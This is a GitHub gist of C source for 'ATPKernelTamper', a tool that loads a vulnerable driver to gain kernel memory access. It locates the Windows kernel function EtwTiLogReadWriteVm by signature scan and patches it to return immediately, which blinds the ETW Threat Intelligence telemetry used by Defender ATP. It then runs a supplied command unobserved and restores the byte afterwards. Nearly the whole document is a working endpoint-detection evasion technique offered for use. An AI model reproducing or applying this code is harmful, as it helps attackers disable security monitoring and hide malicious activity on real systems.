Skip to content

Instantly share code, notes, and snippets.

@b4rtik
Last active August 14, 2022 22:39
  • Star 2 You must be signed in to star a gist
  • Fork 6 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save b4rtik/daefa2b3d9c99d825e354f4d32ec9927 to your computer and use it in GitHub Desktop.
unsigned char signature[] = { 0x41 ,0x83 ,0xf9 ,0x10 ,0xb8 ,0x00 ,0x00 ,0x0c ,0x00 ,0x41 ,0xb8 ,0x00 ,0x00 ,0x03 ,0x00 };
int backoffset = 76;
SIZE_T searchlen = 0x1000000;
typedef struct _RTL_PROCESS_MODULE_INFORMATION
{
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
typedef struct _RTL_PROCESS_MODULES
{
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
BYTE patchFunction(LPVOID kernelbaseaddress, uintptr_t pml4,int offset, const char* function_name, BYTE value)
{
BYTE bres;
BYTE bori;
BYTE patch = value;
uintptr_t size = 0;
uintptr_t p = (uintptr_t)kernelbaseaddress + offset;
printf("[+] %s address: %#x\n", function_name, p);
BOOL result = read_virtual_memory(ghDriver, pml4, p, &bres, 1);
if(!read_virtual_memory(ghDriver, pml4, p, &bori, 1))
{
return 0x0;
}
if (!write_virtual_memory(ghDriver, pml4, p, &patch, 1))
{
return 0x0;
}
if (read_virtual_memory(ghDriver, pml4, p, &bres, 1))
{
printf("[+] %s new value: %#x old value: %#x\n\n", function_name, bres, bori);
}
else
{
return 0x0;
}
return bori;
}
BYTE patchFunction(LPVOID kernelbaseaddress, uintptr_t pml4, int offset, const char* function_name)
{
return patchFunction(kernelbaseaddress, pml4, offset, function_name, 0xc3);
}
int main(int argc, char* argv[])
{
printf("====== ATPKernelTamper ======\n");
if(argc != 2)
{
printf("[-] Usage: ATPKernelTamper.exe binary\n");
return 0;
}
if(!FileExists(argv[1]))
{
printf("[-] Binary file not found\n");
return 0;
}
so_check();
printf("[+] Please make sure your version is detected correctly. Incorrect version detection will leads to BSOD.\n");
printf("[+] Press any key to proceed.\n");
getchar();
VOID* buffer = malloc(searchlen);
if (!LoadDriver())
{
printf("[-] Could not load driver, maybe lack of permission?\n");
return 0;
}
if (!InitDriver()) {
printf("[-] Could not get a handle to driver, is driver loaded?\n");
Dl_UnloadDriver(L"gpcidrv64");
Dl_RemoveDriverFromRegistry(L"gpcidrv64");
return 0;
}
NTSTATUS status;
ULONG i;
PRTL_PROCESS_MODULES ModuleInfo;
ModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 1024 * 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // Allocate memory for the module list
if (!ModuleInfo)
{
printf("\nUnable to allocate memory for module list (%d)\n", GetLastError());
return -1;
}
if (!NT_SUCCESS(status = NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, 1024 * 1024, NULL)))
{
printf("\nError: Unable to query module list (%#x)\n", status);
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return -1;
}
for (i = 0; i < ModuleInfo->NumberOfModules; i++)
{
if (strcmp((char *)(ModuleInfo->Modules[i].FullPathName + ModuleInfo->Modules[i].OffsetToFileName), "ntoskrnl.exe") == 0)
{
printf("[+] Kernel address: %#x\n", ModuleInfo->Modules[i].ImageBase);
uintptr_t pml4 = find_directory_base(ghDriver);
printf("\n");
BOOL result = read_virtual_memory(ghDriver, pml4, (uintptr_t)ModuleInfo->Modules[i].ImageBase, buffer, searchlen);
if(result)
{
DWORD offset = searchSign((unsigned char*)buffer, signature, sizeof(signature));
free(buffer);
printf("[*] Offset %d\n", offset - backoffset);
BYTE EtwTiLogReadWriteVmOri = patchFunction(ModuleInfo->Modules[i].ImageBase, pml4, offset - backoffset, "EtwTiLogReadWriteVm");
printf("[+] Run your command now\n");
int retCode = system(argv[1]);
printf("\n\n");
printf("[+] Execution finished with exit code: %d\n", retCode);
printf("[+] Proceed to restore previous state.\n");
patchFunction(ModuleInfo->Modules[i].ImageBase, pml4, offset - backoffset, "EtwTiLogReadWriteVm", EtwTiLogReadWriteVmOri);
}
else
{
printf("[*] Errore reading kernel memory \n");
}
}
}
CloseHandle(ghDriver);
Dl_UnloadDriver(L"gpcidrv64");
Dl_RemoveDriverFromRegistry(L"gpcidrv64");
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment